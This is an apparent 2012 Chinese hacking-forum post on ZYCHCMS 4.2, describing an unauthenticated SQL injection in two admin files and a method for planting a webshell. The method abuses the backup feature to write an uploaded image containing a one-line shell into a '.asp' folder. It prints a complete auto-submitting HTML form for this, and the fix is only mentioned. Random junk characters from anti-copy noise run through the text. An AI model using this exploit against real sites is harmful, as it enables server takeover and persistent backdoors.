找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1862|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

  w; O2 R& U8 r; a5 M, L
* z1 [/ j2 G0 O* g) n6 \- w
4 l5 u  d8 H. \! p0 L+ f7 \: Y  X3 I: B
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)0 U" G9 P" u& }! V" d* I
①SQL注射漏洞, X# Y  B8 n5 @# O5 R" ]' ~
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
2 o; h: j8 k( i& A/ _2 H 漏洞原因:未过滤* U" k' g; E$ r$ C8 x. M6 Q
漏洞代码:
8 Q- f6 T' g+ V) g 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。. E9 z+ j. c4 T, K
修复方法:在文件开头加入代码
+ g# x( e" O# w* C
2 b8 ]$ k, u+ a! |7 V, L+ z9 A/ A. Q) K2 b, @1 W8 }
②后台拿WBSHELL( R) B) b) |4 ^0 t# \7 d
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
# ^$ `7 w: ]! j 这里在网上找了一个,改了下,将就着用。
! A( @# @4 V, o" N, H$ n 以下是代码本地提交代码& [, b3 F% |. Y/ H% `. J
! N% l1 i# f$ f% F% y6 ^' [

- n6 }5 N) A! I7 F2 f1 z  {9 k! N<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>- P# w6 V  T4 q! N9 n$ F; x5 \) F
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
5 E( \* o6 {2 a! F) y# g7 b" E <tr>
6 B0 V) ~4 e/ {4 Y <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>3 `" h+ |, s( D
</tr>
+ d4 N8 Y  D2 U, D+ _5 J <tr>
0 b1 t. b  j* |- E3 S5 w$ O <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
7 A$ P( N$ U  K& o" `3 Z8 l" _' { </span>; c4 M  \" D& N! t2 B9 v4 y
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
: l+ ]) y" m& Z4 \& a* d <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
& x2 l8 N( `9 s" s. P <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
' w; K8 r  @# U, i! T <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
( x0 Q: ?3 y7 L$ t2 L <div align=”left”>1 w3 ]" Z& N6 \% \. l% Y+ r
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” /># B* C7 B8 _+ Q* |  {% ~
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>$ I- ^7 G" I" F. w( U" P& ]
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />2 c8 z/ d  }8 ]; Z; c6 [
</div></td>! W( [$ s" V' D$ `
</tr>
- S2 u" s" H; B! O <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>! J* S5 a- H- S) Q
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>& i8 U. J4 _- f" |- ^( O* H8 p
<td class=”td”><div align=”left”>
* l2 R) z, O/ B% i. ] <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
" \4 T8 j* J4 o9 \0 D [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>2 ?8 W! b3 I$ a- L8 m4 c! C
</tr>
1 Q$ Q* d4 r9 I6 ?9 z <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
. I% Z( D, ^6 C% M/ V <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
4 J5 E2 r4 `, x! G+ J  n% G <td class=”td”><div align=”left”>
2 U8 g, y3 |2 a5 m. _ <input type=”submit” value=”确定备份” class=”btn”
  T5 N6 b, j! y# A$ `& m- f </div></td>4 y, i9 [* _' E- g5 O' @7 s
</tr>2 ^! e! u5 f. p5 \& m
</table></td></tr></form>
; n) Y' D( W0 y3 ^! f2 L" R </table>
  R4 Y+ N0 S& r% r) d) T+ B9 P+ |9 d# H4 s </td>4 l7 G7 D# S% ^! r
</tr>* p2 j% O: Q! W; I
</table>& Z% L$ x( @$ V# R$ m
<script>
: v8 z; B  e- ^5 U document.all.add.submit();
' C7 v6 V# l# i </script>
0 ]0 {& O) q; c- D  e' v
) ^: _) ]/ X, A& y; {
/ N) ^- u9 j+ w! v$ r# @1 `: v
% |& V/ i8 k- V/ i3 F3 a; k
3 ~1 s4 V6 E" t  ?: T) j
0 {1 @* L4 d- ~" u
$ B) x5 t* X/ A$ O% L( _4 k" ]( f4 `; i

: F3 ^8 L1 i+ Y; u
, @# P8 ~/ n7 J* |
) f1 v) P+ g4 d' `. Q: G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表